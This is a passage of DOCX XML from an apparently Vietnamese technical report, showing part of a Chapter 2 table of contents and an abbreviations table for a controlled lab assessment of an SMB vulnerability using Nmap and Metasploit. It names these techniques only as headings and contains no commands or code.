        <w:t xml:space="preserve">  2.3. Mô hình máy trạng thái đơn biến (Single-Variable Causal State Machine)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F4101" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.3.1. Thiết kế chuỗi 4 trạng thái Snapshot trên cùng một hệ thống mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344DBBC6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.3.2. Vai trò đối chứng nghiệp vụ dương tính của trạm Client tại VLAN 30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252970E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.3.3. Phương pháp luận chứng minh tính bất khả thi của đường tấn công</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC01F7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.4. Phương pháp luận và chuẩn hóa kỹ thuật theo mô hình bạch hộp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ········ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30442A3D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.4.1. Kỹ thuật 1: Khảo sát tiếp cận và nhận diện dịch vụ (TCP SYN Scan)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421520E7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.4.2. Kỹ thuật 2: Thăm dò khả năng đàm phán phương ngữ (Dialect Probe)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C2758" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.4.3. Kỹ thuật 3: Dò quét phát hiện dấu hiệu an toàn bằng Nmap NSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E243F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.4.4. Kỹ thuật 4: Khảo sát đối chứng độc lập bằng Metasploit Auxiliary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E17774" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.4.5. Kỹ thuật 5: Xác minh mức độ tác động có kiểm soát (Metasploit Exploit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B06C90" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.5. Ma trận bằng chứng đa nguồn và quy trình vận hành an toàn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ··········· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841BED5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.5.1. Thiết kế Ma trận bằng chứng thu thập đa nguồn (Evidence Matrix)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D42C826" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.5.2. Quy trình kiểm chứng lưu lượng đa điểm (Multi-Point PCAP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ······· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26051A52" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.5.3. Kế hoạch ứng phó sự cố màn hình xanh (BSOD) và Rollback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ········· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCF7E54" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  TỔNG KẾT CHƯƠNG 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ························································ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E1B62" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  TÀI LIỆU THAM KHẢO CHƯƠNG 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·············································· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD414A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E80AF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC CÁC TỪ VIẾT TẮT</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1728"/>
        <w:gridCol w:w="3312"/>
        <w:gridCol w:w="3888"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="7F990FAD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="4A3B9A62" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Ký hiệu viết tắt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="6B9E6F26" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Thuật ngữ tiếng Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="381B04EF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Ý nghĩa giải thích</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="30D14F78" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2DFB4B4C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1C84685F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Server Message Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1EA4BC1C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Giao thức truyền thông mạng chia sẻ tệp và máy in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="0BE67616" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="68E28B81" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CIFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="560EB6B1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Common Internet File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0D83948C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên gọi khác của phương ngữ SMB phiên bản 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="60A2515B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="234CD873" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="56187EEE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="04CA516C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lỗ hổng thực thi mã tùy ý từ xa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="467C1E67" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4E1807F1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>BSOD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0AF59A5F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Blue Screen of Death</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0B2FDE9F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lỗi màn hình xanh dừng hệ điều hành Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="7FA23570" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="22A72871" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>IPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01C7346C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Inter-Process Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5232BDA5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cơ chế giao tiếp liên tiến trình qua đường ống ẩn IPC$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="30748BF5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0CE8FA02" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="60CBDCFE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Remote Procedure Call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="07E9D3F1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cơ chế gọi thủ tục từ xa trong kiến trúc mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="1B34FC92" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="022A13D1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>NBT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2346FC4A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>NetBIOS over TCP/IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="754961AC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phương thức truyền tải gói tin NetBIOS trên giao thức TCP/IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="03683556" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
